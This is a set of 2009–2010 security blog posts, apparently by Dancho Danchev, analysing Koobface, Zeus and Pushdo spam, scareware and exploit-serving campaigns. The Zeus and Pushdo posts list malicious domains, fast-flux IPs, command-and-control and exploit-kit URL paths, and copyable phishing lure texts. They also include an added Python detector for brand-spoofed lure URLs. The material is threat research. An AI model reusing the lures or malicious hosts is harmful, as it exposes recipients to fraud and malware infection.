Summarizing Zero Day's Posts for December (2010-01-04 22:03)

The following is a brief summary of all of my posts at [1]ZDNet's Zero Day for December, 2009.

You can also go through [2]previous summaries, as well as subscribe to my [3]personal RSS feed, [4]Zero Day's main feed, or follow all of [5]ZDNet's blogs on Twitter.

01. [6]Koobface botnet enters the Xmas season
02. [7]How many people fall victim to phishing attacks?
03. [8]Zeus crimeware using Amazon's EC2 as command and control server
04. [9]Report: Google's reCAPTCHA flawed
05. [10]FBI: Scareware distributors stole $150M

This post has been reproduced from [11]Dancho Danchev's blog.

1. http://blogs.zdnet.com/security
2. http://ddanchev.blogspot.com/2009/11/summarizing-zero-days-posts-for.html
3. http://updates.zdnet.com/tags/dancho-l-danchev.html?t=0&s=0&o=1&mode=rss
4. http://feeds.feedburner.com/zdnet/security
5. http://twitter.com/zdnetblogs
6. http://blogs.zdnet.com/security/?p=5001
7. http://blogs.zdnet.com/security/?p=5084
8. http://blogs.zdnet.com/security/?p=5110
9. http://blogs.zdnet.com/security/?p=5123
10. http://blogs.zdnet.com/security/?p=5140
11. http://ddanchev.blogspot.com/

Top Ten Must-Read Posts at ZDNet's Zero Day for 2009 (2010-01-04 22:10)


The end of the year naturally means a rush to come up with 'best of the best' top lists consisting of your finest content. However, based on personal observations, during the holiday season the short attention span of the average reader becomes even shorter, with everyone looking forward to taking a well-deserved break. Therefore, the first working week of the new year appears to be the perfect moment to summarize some of my most insightful posts/analysis published at [1]ZDNet's Zero Day for 2009.

The following ten posts have been featured due to their insightful content, the comprehensiveness of the topic covered, and their plain and simple exclusivity at the time of publishing. You will, of course, be missing the big picture if you don't keep track of [2]Ryan Naraine's coverage.

Thank you for being a [3]Zero Day reader! 

01. [4]Microsoft study debunks phishing profitability
02. [5]Inside BBC's Chimera botnet
03. [6]China's 'secure' OS Kylin - a threat to U.S offensive cyber capabilities?
04. [7]Microsoft study debunks profitability of the underground economy
05. [8]Iranian opposition launches organized cyber attack against pro-Ahmadinejad sites - [9]Related coverage
06. [10]The Ultimate Guide to Scareware Protection
07. [11]'Anonymous' group attempts DDoS attack against Australian government (Operation Didgeridie)
08. [12]Google's CAPTCHA experiment and the human factor
09. [13]Does software piracy lead to higher malware infection rates?
10. [14]Koobface botnet enters the Xmas season

Related posts:

[15] Summarizing Zero Day's Posts for January, 2009
[16] Summarizing Zero Day's Posts for February, 2009
[17] Summarizing Zero Day's Posts for March, 2009
[18] Summarizing Zero Day's Posts for April, 2009
[19] Summarizing Zero Day's Posts for May, 2009
[20] Summarizing Zero Day's Posts for June, 2009
[21] Summarizing Zero Day's Posts for July, 2009
[22] Summarizing Zero Day's Posts for August, 2009
[23] Summarizing Zero Day's Posts for September, 2009
[24] Summarizing Zero Day's Posts for October, 2009
[25] Summarizing Zero Day's Posts for November, 2009
[26] Summarizing Zero Day's Posts for December, 2009

This post has been reproduced from [27]Dancho Danchev's 
blog. 

1. http://blogs.zdnet.com/security
2. http://updates.zdnet.com/tags/Ryan+Naraine.html
3. http://feeds2.feedburner.com/zdnet/security
4. http://blogs.zdnet.com/security/?p=2366
5. http://blogs.zdnet.com/security/?p=3045
6. http://blogs.zdnet.com/security/?p=3385
7. http://blogs.zdnet.com/security/?p=3522
8. http://blogs.zdnet.com/security/?p=3613
9. http://ddanchev.blogspot.com/2009/06/iranian-opposition-ddos-es-pro.html
10. http://blogs.zdnet.com/security/?p=4297
11. http://blogs.zdnet.com/security/?p=4234
12. http://blogs.zdnet.com/security/?p=3178
13. http://blogs.zdnet.com/security/?p=4605
14. http://blogs.zdnet.com/security/?p=5001
15. http://ddanchev.blogspot.com/2009/02/summarizing-zero-days-posts-for-january.html
16. http://ddanchev.blogspot.com/2009/03/summarizing-zero-days-posts-for.html
17. http://ddanchev.blogspot.com/2009/03/summarizing-zero-days-posts-for-march.html
18. http://ddanchev.blogspot.com/2009/05/summarizing-zero-days-posts-for-april.html
19. http://ddanchev.blogspot.com/2009/06/summarizing-zero-days-posts-for-may.html
20. http://ddanchev.blogspot.com/2009/07/summarizing-zero-days-posts-for-june.html
21. http://ddanchev.blogspot.com/2009/08/summarizing-zero-days-posts-for-july.html
22. http://ddanchev.blogspot.com/2009/09/summarizing-zero-days-posts-for-august.html
23. http://ddanchev.blogspot.com/2009/10/summarizing-zero-days-posts-for.html
24. http://ddanchev.blogspot.com/2009/11/summarizing-zero-days-posts-for-october.html
25. http://ddanchev.blogspot.com/2009/11/summarizing-zero-days-posts-for.html
26. http://ddanchev.blogspot.com/2010/01/summarizing-zero-days-posts-for.html
27. http://ddanchev.blogspot.com/

[Screenshot: the Koobface gang's holiday message, referenced in item 10 of the list below]

Our team, so often called "Koobface Gang", high gratitude for the help in bug fixing, researches and documentation for our software to:

• Kaspersky Lab for the name of Koobface and 25 millionth malicious program award;
• Dancho Danchev (http://ddanchev.blogspot.com) who worked hard every day especially on our First Software & Architecture version, writing lots of e-mails to different hosting companies and structures to take down our Command-and-Control (C&C) servers, and of course analyzing software under VMWare;
• Trend Micro (http://trendmicro.com), especially personal thanks Jonell Baltazar, Joey Costoya, and Ryan Flores who had released a very cool document (with three parts!) describing all our mistakes we've ever made;
• Cisco for their 3rd place to our software in their annual "working groups awards";
• Soren Siebert with his great article;
• Hundreds of users who send us logs, crash reports, and wish-lists.

In fact, it was a really hard year. We've made many efforts to improve our software. Thanks to Facebook's security team - the guys made us move ahead. And we've moved. And will move. Improving their security system.

By the way, we did not have a cent using Twitter's traffic. But many security issues tell the world we did. They are wrong.

As many people know, "virus" is something awful, which crashes computers, steals credential information as good as all passwords and credit cards. Our software did not ever steal credit card or other bank information, passwords or any other confidential data. And will NOT EVER.

As for the crashes... We are really sorry. We work on it ;)

Wish you a good luck in new year and... Merry Christmas to you!

Always yours, "Koobface Gang".

Top Ten Must-Read DDanchev Posts For 2009 (2010-01-04 22:37)

The following ten posts have been featured due to their insightful content, comprehensiveness of the topic covered, and due to plain simple exclusivity at the time of publishing, and not necessarily based on page views.

Thank you for being a regular reader of my personal blog. Feel free to subscribe to [1]my RSS feed, keep track of [2]my posts at ZDNet's Zero Day, or [3]follow me on Twitter.

01. [4]Conficker's Scareware/Fake Security Software Business Model
02. [5]Koobface Botnet's Scareware Business Model - Part One and [6]Part Two
03. [7]Inside a Money Laundering Group's Spamming Operations
04. [8]A Peek Inside the Managed Blackhat SEO Ecosystem
05. [9]Iranian Opposition DDoS-es pro-Ahmadinejad Sites
06. [10]Koobface Botnet Redirects Facebook's IP Space to my Blog
07. [11]Standardizing the Money Mule Recruitment Process
08. [12]Koobface Botnet Starts Serving Client-Side Exploits
09. The SMS Ransomware series - [13]SMS Ransomware Displays Persistent Inline Ads; [14]SMS Ransomware Source Code Now Offered for Sale; [15]3rd SMS Ransomware Variant Offered for Sale; [16]4th SMS Ransomware Variant Offered for Sale; [17]5th SMS Ransomware Variant Offered for Sale; [18]6th SMS Ransomware Variant Offered for Sale
10. [19]The Koobface Gang Wishes the Industry "Happy Holidays"

This post has been reproduced from [20]Dancho Danchev's 
blog. 

1. http://feeds.feedburner.com/DanchoDanchevOnSecurityAndNewMedia
2. http://updates.zdnet.com/tags/dancho+danchev.html?o=1&mode=rss
3. http://twitter.com/danchodanchev
4. http://ddanchev.blogspot.com/2009/04/confickers-scarewarefake-security.html
5. http://ddanchev.blogspot.com/2009/09/koobface-botnets-scareware-business.html
6. http://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.html
7. http://ddanchev.blogspot.com/2009/05/inside-money-laundering-groups-spamming.html
8. http://ddanchev.blogspot.com/2009/06/peek-inside-managed-blackhat-seo.html
9. http://ddanchev.blogspot.com/2009/06/iranian-opposition-ddos-es-pro.html
10. http://ddanchev.blogspot.com/2009/10/koobface-botnet-redirects-facebooks-ip.html
11. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html
12. http://ddanchev.blogspot.com/2009/11/koobface-botnet-starts-serving-client.html
13. http://ddanchev.blogspot.com/2009/09/sms-ransomware-displays-persistent.html
14. http://ddanchev.blogspot.com/2009/05/sms-ransomware-source-code-now-offered.html
15. http://ddanchev.blogspot.com/2009/05/3rd-sms-ransomware-variant-offered-for.html
16. http://ddanchev.blogspot.com/2009/07/4th-sms-ransomware-variant-offered-for.html
17. http://ddanchev.blogspot.com/2009/07/5th-sms-ransomware-variant-offered-for.html
18. http://ddanchev.blogspot.com/2009/08/6th-sms-ransomware-variant-offered-for.html
19. http://ddanchev.blogspot.com/2009/12/koobface-gang-wishes-industry-happy.html
20. http://ddanchev.blogspot.com/


[Screenshot: spam messages posted to Google Groups by the Koobface gang, as referenced in the post below]

"Happy New Year clip" - "It's a gift from Abba, all for free! Enjoy! [link]" - By Abba - 12:36am
"Happy New Year" - "Happy New Year! A little gift: [link]" - By Santa Claus - Jan 6
"My new clip" - "Hi! My new video, for funs :) [link]" - By Rebecca MacKinnon - Jan 4
"Have You Seen" - "Hi to my group friends! Have You seen this new video? [link]" - By Valeria - Jan 2
"Celebrities mistakes in New Year speech" - "U-ga-ga.. New Year party, Drunk Celebrities Exposed Just look at this: [link]" - By Reporter X - Jan 2
"My wedding video" - "Hi. Here is our wedding video. Happy New Year! [link]" - By Celicia Johnson - Dec 31 2009
"A joke" - "O-ha-ha What are they doing? PS Just a joke, but so funny :) [link]" - By Anna F - Dec 30 2009
"Very cute and funny kids)" - "This is so cute and funny)) [link]" - By KittyJenns - Dec 27 2009
"Super funny animals))))" - "aaaaa))))look at this)))they'r soooo funny, can't stop smiling)) [link]" - By SaraSamuelson - Dec 25 2009

Scareware, Blackhat SEO, Spam and Google Groups Abuse, Courtesy of the Koobface Gang (2010-01-08 17:29)

The Koobface gang is known to have embraced the potential of the "underground multi-tasking" model a long time ago, in order to achieve a "malicious economies of scale" effect. This "underground multi-tasking" most commonly comes in the form of multiple monetization campaigns which, upon closer analysis, always lead back to the Koobface gang's infrastructure. In fact, the gang is so obsessed with efficiency that the redirectors and key malicious domains of one campaign are simultaneously rotated across all the campaigns that they manage.

For instance, throughout the past half year, a huge percentage of the malicious infrastructure used simultaneously in multiple campaigns was parked at the [1]now shut down Riccom LTD - AS29550. From the [2]massive blackhat SEO campaigns affecting millions of legitimate web sites managed by the gang, to the [3]malvertising attack at the New York Times web site and [4]the click-fraud facilitating [5]Bahama botnet, the Koobface botnet is only the tip of the iceberg for the efficient and fraudulent money machine that the gang operates.

[Screenshot: fake "Windows Security" scanner page styled as a Windows "My Computer" window, reporting "Your Computer is infected" with "Trojan.Qoologic - Key Logger" and "W95/Elkern" at threat level High, and urging the visitor to click "Start Protection"]

In this analysis, I'll once again establish a connection between the ongoing blackhat SEO campaigns managed by the gang ([6]Blackhat SEO Campaign Hijacks U.S Federal Form Keywords, Serves Scareware; [7]U.S Federal Forms Blackhat SEO Themed Scareware Campaign Expanding; [8]Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign), a spam campaign that's also syndicated across multiple Google Groups, and the Koobface botnet itself, with a particular emphasis on the scareware monetization taking place across all the campaigns.

Related Koobface research and analysis:

[9] The Koobface Gang Wishes the Industry "Happy Holidays"
[10] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline
[11] Koobface Botnet Starts Serving Client-Side Exploits
[12] Massive Scareware Serving Blackhat SEO, the Koobface Gang Style
[13] Koobface Botnet's Scareware Business Model - Part Two
[14] Koobface Botnet's Scareware Business Model - Part One
[15] Koobface Botnet Redirects Facebook's IP Space to my Blog
[16] New Koobface campaign spoofs Adobe's Flash updater
[17] Social engineering tactics of the Koobface botnet
[18] Koobface Botnet Dissected in a TrendMicro Report
[19] Movement on the Koobface Front - Part Two
[20] Movement on the Koobface Front
[21] Koobface - Come Out, Come Out, Wherever You Are
[22] Dissecting Koobface Worm's Twitter Campaign

This post has been reproduced from [23]Dancho Danchev's 
blog. 

1. http://ddanchev.blogspot.com/2009/12/koobface-friendly-riccom-ltd-as29550.html
2. http://ddanchev.blogspot.com/2009/11/massive-scareware-serving-blackhat-seo.html
3. http://ddanchev.blogspot.com/2009/09/ukrainian-fan-club-features.html
4. http://blogs.zdnet.com/security/?p=4549
5. http://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.html
6. http://ddanchev.blogspot.com/2009/08/blackhat-seo-campaign-hijacks-us.html
7. http://ddanchev.blogspot.com/2009/08/us-federal-forms-blackhat-seo-themed.html
8. http://ddanchev.blogspot.com/2009/08/dissecting-ongoing-us-federal-forms.html
9. http://ddanchev.blogspot.com/2009/12/koobface-gang-wishes-industry-happy.html
10. http://ddanchev.blogspot.com/2009/12/koobface-friendly-riccom-ltd-as29550.html
11. http://ddanchev.blogspot.com/2009/11/koobface-botnet-starts-serving-client.html
12. http://ddanchev.blogspot.com/2009/11/massive-scareware-serving-blackhat-seo.html
13. http://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.html
14. http://ddanchev.blogspot.com/2009/09/koobface-botnets-scareware-business.html
15. http://ddanchev.blogspot.com/2009/10/koobface-botnet-redirects-facebooks-ip.html
16. http://blogs.zdnet.com/security/?p=4594
17. http://content.zdnet.com/2346-12691_22-352597.html
18. http://ddanchev.blogspot.com/2009/10/koobface-botnet-dissected-in-trendmicro.html
19. http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front-part-two.html
20. http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front.html
21. http://ddanchev.blogspot.com/2009/07/koobface-come-out-come-out-wherever-you.html
22. http://ddanchev.blogspot.com/2009/07/dissecting-koobface-worms-twitter.html
23. http://ddanchev.blogspot.com/

[Screenshot: spoofed Outlook Web Access e-mail, "new settings file for fx@ mailbox", styled as Microsoft Exchange Server 2003 OWA, telling the recipient that the default mailbox settings were changed and asking them to download and launch fx-settings-file.exe]

Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware (2010-01-08 23:53)

UPDATED: Sunday, January 10, 2010 - The post has been updated with the latest domains spammed within the past 24 hours.

UPDATED: Saturday, January 09, 2010 - The post has been updated with the latest domains spammed within the past 24 hours. The spam campaign is ongoing.

A currently ongoing spam campaign is using the "Your default mailbox settings have changed" theme in order to trick gullible users into executing Trojan-Spy.Win32.Zbot ([1]settings-file.exe).

Sample message:

"The default settings of your mailbox were automatically changed. Please download and launch a file with a new set of settings for your e-mail account: fx-settings-file.exe.

We constantly work on the quality level of our service, as well as on the development of its security and protection. During the last upgrade several essential improvements were adopted, such as new ports for the POP3 & SMTP protocols, plus the SMTP autentification. The new settings are necessary for those who use the mailings clients (for ex. Microsoft Outlook, The Bat!, Mozilla Thunderbird etc.) or those who use our service via the web-interface."

[Figure: fast-flux graph for 188.56.139.174 (AS16135), with further nodes in AS27699, AS8151, AS9121, AS7418, AS12140, AS13489, AS4766, AS17676, AS9829, AS9674, AS18182 and AS9116]

Sample campaign structure:

molendf.co .kr/owa/service_directory/settings.php?email=fx@yahoo.com&from=yahoo.com&fromname=fx

Fast-fluxed seed IPs:

61.64.170.232
77.126.141.142
188.56.139.174
189.110.244.68
189.179.13.36
190.82.217.255
195.174.109.241
200.169.71.144
201.232.187.200
201.236.48.117
210.106.80.90
218.153.64.25
221.26.184.25
59.92.58.166
61.20.133.88

DNS servers of notice:

ns1.moorcargo .net
ns1.aj-realtors .com - Email: support@ajr.com
ns1.groupswat .com
ns1.elkins-realty .net - Email: BO.la@yahoo.com
ns1.nocksold .com - Email: termer@counsellor.com
ns1.seldomservice .net - 89.238.165.195 - Email: pp0271@gmail.com
ns1.viking-gave .net - 89.238.165.195 - Email: glonders@gmail.com
ns1.controlpanellsolutions .com - 212.95.50.175 - Email: jobwes@clerk.com

Hundreds of typosquatted subdomains reside within the following currently active domains:

ujjiks.co .im
ujjiks.com .im
ujjiks.org .im
ujjikx.co .im
ujjikx.com .im
ujjikx.org .im
molendf.co .kr
molendf .com
molendf .kr
molendf.ne .kr
molendf.or .kr
vcrssdl .cc
vcrssdl .eu
vfrtssd .com
vsmprot.co .uk
vsmprot .com
vsmprot .eu
vsmprot.me .uk
vsmprot.org .uk
ikuu8a .com - Email: bjnjnsls@technologist.com
ikuu8d .com - Email: bjnjnsls@technologist.com
ikuu8e .com - Email: bjnjnsls@technologist.com
ikuu8q .com - Email: bjnjnsls@technologist.com
ikuu8s .com - Email: bjnjnsls@technologist.com
ikuu8w .com - Email: bjnjnsls@technologist.com
ikuu8x .com - Email: bjnjnsls@technologist.com
ikuu8z .com - Email: bjnjnsls@technologist.com
ikuu8a .net - Email: bjnjnsls@technologist.com
ikuu8e .net - Email: bjnjnsls@technologist.com
ikuu8q .net - Email: bjnjnsls@technologist.com
ikuu8s .net - Email: bjnjnsls@technologist.com
ikuu8w .net - Email: bjnjnsls@technologist.com
ikuu8x .net - Email: bjnjnsls@technologist.com
ikuu8z .net - Email: bjnjnsls@technologist.com
yhuttte.ne .kr - Email: scepterpdg@chemist.com
yhuttti.ne .kr - Email: scepterpdg@chemist.com
yhutttu.ne .kr - Email: scepterpdg@chemist.com
yhuttte .kr - Email: scepterpdg@chemist.com
yhuttti .kr - Email: scepterpdg@chemist.com
yhuttte.co .kr - Email: scepterpdg@chemist.com
yhuttti.co .kr - Email: scepterpdg@chemist.com
yhutttr.co .kr - Email: scepterpdg@chemist.com
yhutttu.co .kr - Email: scepterpdg@chemist.com
yhuttte.or .kr - Email: scepterpdg@chemist.com
yhuttti.or .kr - Email: scepterpdg@chemist.com
yhutttr.or .kr - Email: scepterpdg@chemist.com
yhutttu.or .kr - Email: scepterpdg@chemist.com
yhutttr .kr - Email: scepterpdg@chemist.com
yhutttu .kr - Email: scepterpdg@chemist.com
ujyhl.ne .kr - Email: combinetct@financier.com
ujyho.ne .kr - Email: combinetct@financier.com
ujyhf .kr - Email: combinetct@financier.com
ujyhl .kr - Email: combinetct@financier.com
ujyhf.co .kr - Email: combinetct@financier.com
ujyhl.co .kr - Email: combinetct@financier.com
ujyho.co .kr - Email: combinetct@financier.com
ujyhs.co .kr - Email: combinetct@financier.com
ujyho .kr - Email: combinetct@financier.com
ujyhf.or .kr - Email: combinetct@financier.com
ujyhl.or .kr - Email: combinetct@financier.com
ujyho.or .kr - Email: combinetct@financier.com
ujyhs.or .kr - Email: combinetct@financier.com
ujyhs .kr - Email: combinetct@financier.com

Seen within the past 24 hours, now offline domains part of the campaign:

yhe3essa .com.pl
yhe3essd .com.pl
yhe3esse .com.pl
yhe3essf .com.pl
yhe3essg .com.pl
yhe3essi .com.pl
yhe3esso .com.pl
yhe3essp .com.pl
yhe3essq .com.pl
yhe3essr .com.pl
yhe3esss .com.pl
yhe3esst .com.pl
yhe3essu .com.pl
yhe3essw .com.pl
yhe3essy .com.pl
ok9iio1 .com
ok9iio2 .com
ok9iio3 .com
ok9iio4 .com
ok9iio5 .com
ok9iio6 .com
ok9iio7 .com
ok9iio8 .com
ok9iio1 .net
ok9iio2 .net
ok9iio3 .net
ok9iio4 .net
ok9iio5 .net
ok9iio6 .net
ok9iio7 .net

Upon execution the sample phones back to nekovo .ru, already [2]blacklisted by the Zeus Tracker: nekovo .ru/cbd/nekovo.bri; nekovo .ru/ip.php - 109.95.114.70 - Email: kievsk@yandex.ru - AS50215 - Troyak-as Starchenko Roman Fedorovich.

Related Zeus crimeware name servers respond to the same IP:

- ns1.trust-service .cn - (domain itself [3]responds to 193.104.41.133) - Email: olezhiosapiel@yahoo.es
- ns1.elnasa .ru - (domain itself [4]responds to 91.200.164.12) - Email: kievsk@yandex.ru
- ns1.recessa .ru - (domain itself [5]responds to 193.104.41.69) - Email: kievsk@yandex.ru
- ns1.stomaid .ru - (domain itself [6]responds to 91.200.164.10) - Email: kievsk@yandex.ru

Parked within the same AS are also the following currently active Zeus crimeware serving domains:

web-information-services .com - 91.198.109.69 - Email: pita@bigmailbox.ru
erthjuyt44u .com - 91.198.109.19 - Email: rails@qx8.ru
excellenthostingservice .com - 91.198.109.48 - Email: xm@qx8.ru
goldhostingservice .com - 91.198.109.32 - Email: clod@qx8.ru

Pretty much your typical cybercrime-friendly virtual neighborhood.

Related posts:

[7] Pushdo Injecting Bogus Swine Flu Vaccine
[8] "Your mailbox has been deactivated" Spam Campaign Serving Crimeware
[9] Ongoing FDIC Spam Campaign Serves Zeus Crimeware
[10] The Multitasking Fast-Flux Botnet that Wants to Bank With You

This post has been reproduced from [11]Dancho Danchev's blog.

1. http://www.virustotal.com/analisis/26efaeec869a31abb49fdcc6ef82207f1234f92b73de01589e8294a053f31d7b-1262987325
2. https://zeustracker.abuse.ch/monitor.php?host=nekovo.ru
3. https://zeustracker.abuse.ch/monitor.php?host=trust-service.cn
4. https://zeustracker.abuse.ch/monitor.php?host=elnasa.ru
5. https://zeustracker.abuse.ch/monitor.php?host=recessa.ru
6. https://zeustracker.abuse.ch/monitor.php?host=stomaid.ru
7. http://ddanchev.blogspot.com/2009/12/pushdo-injecting-bogus-swine-flu.html
8. http://ddanchev.blogspot.com/2009/11/your-mailbox-has-been-deactivated-spam.html
9. http://ddanchev.blogspot.com/2009/10/ongoing-fdic-spam-campaign-serves-zeus.html
10. http://ddanchev.blogspot.com/2009/07/multitasking-fast-flux-botnet-that.html
11. http://ddanchev.blogspot.com/

Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams (2010-01-13 21:10)

UPDATED: Friday, January 15, 2010 - The gang continues rotating the campaigns by targeting different brands. Over the past 24 hours they've been spamming the well-known "Notice of Underreported Income" theme, this time targeting HM Revenue and Customs (HMRC), and have also introduced new portfolios of typosquatted domains, next to changing the client-side exploits serving iFrame embedded on each and every page.

- Sample message: "Filing and paying your federal taxes correctly and on time is an important part of living and working in the United Kingdom. Please review (download and execute) your tax statement, if the statement is incorrect, contact our Taxpayer Advocate Service."

- Sample URL: online.hmrc.gov.uk.olpiku5v .com.pl/SecurityWebApp/httpsmode/statement.php
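
The two lure hostnames quoted in these posts (online.hmrc.gov.uk.olpiku5v .com.pl here, and the OWA subdomains under molendf.co .kr in the previous post) share one trick: a legitimate brand hostname placed in front of an attacker-registered domain. The Python below is an added example, not code from the post or the author's own tooling. It computes the registrable domain with a small constructed suffix list, compares it against a constructed list of protected brand hostnames, and additionally flags the ".exe" download and "/owa/ on a non-corporate domain" indicators that this campaign's links carry; the suffix list, the brand list and the OWA allowlist are all assumptions for the demo.

```python
"""Flag lure URLs that put a legitimate brand hostname in front of an attacker-owned domain.

Added example, not code from the post. The suffix list, the brand list and the OWA
allowlist are constructed for the demo; a deployment would load the full Public Suffix
List and its own inventories.
"""
from typing import List, Optional, Tuple
from urllib.parse import SplitResult, urlsplit

# Two-label public suffixes present in the campaign's domain portfolio (constructed subset).
MULTI_LABEL_SUFFIXES = {
    "co.kr", "ne.kr", "or.kr", "com.pl", "co.uk", "me.uk", "org.uk", "gov.uk",
    "co.im", "com.im", "org.im",
}
# Brand hostnames that should never appear as a prefix of some other registrable domain
# (constructed; the first two are the brands abused in the quoted lures).
PROTECTED_HOSTS = {"online.hmrc.gov.uk", "mail.yahoo.com", "owa.example-corp.com"}
# Domains where an /owa/ path is expected (constructed allowlist).
CORPORATE_OWA_DOMAINS = {"example-corp.com"}


def _split(url: str) -> SplitResult:
    """urlsplit() that tolerates the scheme-less 'host/path' form used in the post."""
    return urlsplit(url if "://" in url else "http://" + url)


def registrable_domain(host: str) -> str:
    """Owner-controlled part of a hostname: olpiku5v.com.pl, molendf.co.kr, yahoo.com."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) > 2 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def spoofed_brand(url: str) -> Optional[Tuple[str, str]]:
    """Return (brand, attacker_domain) when a protected brand hostname is a prefix of the
    URL's host but the registrable domain belongs to someone else; None otherwise."""
    host = (_split(url).hostname or "").lower()
    for brand in PROTECTED_HOSTS:
        if host == brand or host.startswith(brand + "."):
            owner = registrable_domain(host)
            if owner != registrable_domain(brand):
                return brand, owner
    return None


def lure_indicators(url: str) -> List[str]:
    """Cheap, high-signal indicators that the campaign's lure URLs all carry."""
    parts = _split(url)
    host = (parts.hostname or "").lower()
    reasons = []
    hit = spoofed_brand(url)
    if hit:
        reasons.append(f"brand host {hit[0]} embedded under attacker domain {hit[1]}")
    if ".exe" in (parts.path + "?" + parts.query).lower():
        reasons.append("link delivers a Windows executable")
    if "/owa/" in parts.path.lower() and registrable_domain(host) not in CORPORATE_OWA_DOMAINS:
        reasons.append("Outlook Web Access path on a non-corporate domain")
    return reasons


if __name__ == "__main__":
    for sample in (
        "online.hmrc.gov.uk.olpiku5v.com.pl/SecurityWebApp/httpsmode/statement.php",
        "molendf.co.kr/owa/service_directory/settings.php?email=fx@yahoo.com",
        "https://online.hmrc.gov.uk/self-assessment",
    ):
        print(sample, "->", lure_indicators(sample) or "clean")
```

The registrable-domain comparison is what makes this robust against the gang's habit of rotating through hundreds of typosquatted hosts: the brand prefix stays constant while only the attacker's suffix changes, so no per-domain blocklist is needed.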

Detection rates for tax-statement.exe ([1]Trojan-Spy.Win32.Zbot.gen) and file.exe ([2]Trojan-Spy.Win32.Zbot.gen).

Upon execution, the samples attempt to connect to elnasa 
.ru/asd/elnasa.ble (109.95.114 .71/asd/elnasa.ble). 

The structure of the iFrame, now using an IP address instead of a domain name, remains the same:

- 109.95.114.251 /uksl/in.php - 109.95.114.251 - AS50369 - VISHCLUB-as Kanyovskiy Andriy Yuriyovich - akanyovskiy@troyak.org
- 109.95.114.251 /uksl/jquery.jxx
- 109.95.114.251 /uksl/xd/pdf.pdf
- 109.95.114.251 /uksl/load.php
- 109.95.114.251 /uksl/file.exe

DNS servers of notice:

ns1.pds-properties .com - 89.238.165.195
ns1.noeproperties .com - 84.243.201.159
ns1.densondatabase .com - 94.23.177.147
ns1.dogsgrem .net - 89.238.165.195 - Email: glonders@gmail.com - Email seen in [3]previous domain registrations

Typosquatted domains spammed over the past 24 hours:

olpiku5a .com.pl
olpiku5b .com.pl
olpiku5c .com.pl
olpiku5d .com.pl
olpiku5e .com.pl
olpiku5f .com.pl
olpiku5g .com.pl
olpiku5q .com.pl
olpiku5r .com.pl
olpiku5s .com.pl
olpiku5t .com.pl
olpiku5v .com.pl
olpiku5w .com.pl
olpiku5x .com.pl
olpiku5z .com.pl
ujo9ia .com.pl
ujo9id .com.pl
ujo9ie .com.pl
ujo9if .com.pl
ujo9ig .com.pl
ujo9ih .com.pl
ujo9im .com.pl
ujo9in .com.pl
ujo9iq .com.pl
ujo9ir .com.pl
ujo9is .com.pl
ujo9it .com.pl
ujo9iw .com.pl
ujo9iy .com.pl
ujo9iz .com.pl
tlllut .me.uk
tllluy .me.uk
tllluz .me.uk
tllluk .org.uk
tlllut .org.uk
tllluz .org.uk
tllluk .co.uk
tllluy .co.uk
okiolh .ne.kr
okiolw .ne.kr
okiolh .kr
okiolh .co.kr
okiolu .co.kr
okiolv .co.kr
okiolw .co.kr
okiolh .or.kr
okiolu .or.kr
okiolv .or.kr
okiolw .or.kr
okiolu .kr
okiolv .kr
okiolw .kr
proterpl .im
virtdit1 .im
virtdit2 .im
virtdit3 .im
virtdit4 .im
virtdit5 .im
virtdit6 .im
virtdit7 .im
virtdit8 .im

UPDATED: Gary Warner offers additional insights into the latest campaigns - [4]This Week in Avalanche / Zbot / Zeus Bot: HSBC & eBay.

What the botnet masters forget is that with each and every campaign, based on a number of factors, they reveal more about themselves and their affiliations within the cybercrime ecosystem. The degree of monetization is proportional to the loss of OPSEC (operational security), and this remains valid for any fraudulent campaign, botnet or cybercrime community in general.

UPDATED: To clarify, in this campaign Pushdo acts as [5]the spam platform for the [6]Avalanche/MS-Redirect botnet.

In need of a good example of why you shouldn't be interacting with spam/phishing emails in any other way than reporting/deleting them, unless of course you're in the business of analyzing them?

Last week's [7]OWA-themed Zeus-serving spam campaign, courtesy of the Pushdo botnet, has not just resumed, but is continuing to serve client-side exploits (CVE-2007-5659; CVE-2008-2992; CVE-2009-0927) to anyone visiting the spammed web sites, through an iFrame embedded on all of them. Such traffic optimization tactics are nothing new: the botnet master anticipates that the visitor who clicked on the link may not be that stupid the next time, so serving the malware through client-side exploits, without any interaction on the visitor's part, is the tactic of choice.

Let's dissect the campaign, list all of the currently active fast-fluxed domains, the name servers of notice, the client-side exploit serving structure, and the Russian Brides scam domains spamvertised over the last few days.

Active fast-fluxed domains part of the campaign:

leptprs.co .kr - Email: wawddhaepny@yahoo.com
leptprs .kr - Email: wawddhaepny@yahoo.com
leptprs.ne .kr - Email: wawddhaepny@yahoo.com
leptprs.or .kr - Email: wawddhaepny@yahoo.com
oki8uuu.co .kr - Email: wawddhaepny@yahoo.com
ui7772.co .kr - Email: jn.hadler@jkh.org.uk
ui7772 .kr - Email: jn.hadler@jkh.org.uk
ui7772.ne .kr - Email: jn.hadler@jkh.org.uk
ui7772.or .kr - Email: jn.hadler@jkh.org.uk
ui777f .kr - Email: jn.hadler@jkh.org.uk
ui777f.ne .kr - Email: jn.hadler@jkh.org.uk
ui777f.or .kr - Email: jn.hadler@jkh.org.uk
ui777fne .kr - Email: jn.hadler@jkh.org.uk
ui777l.co .kr - Email: jn.hadler@jkh.org.uk
ui777p.co .kr - Email: jn.hadler@jkh.org.uk
ui777p .kr - Email: jn.hadler@jkh.org.uk
ui777p.ne .kr - Email: jn.hadler@jkh.org.uk
ui777p.or .kr - Email: jn.hadler@jkh.org.uk
DNS servers of notice:

ns1.raddoor .com - Email: figarro77@gmail.com
ns1.snup-up .net - Email: dietsnak@socialworker.net
ns1.aj-realty .net - Email: support@aj-realty.net
ns1.aj-administration .com - Email: manager@mack.net
ns1.aj-talentsearch .com - Email: supp@mail.net
ns1.eurobankfinance .net - Email: termer@counsellor.com
ns1.hetn91 .com - Email: astrix@aol.com
ns1.personnel-aj .com - Email: KimMlngram@aol.com
ns1.nitroexcel .net
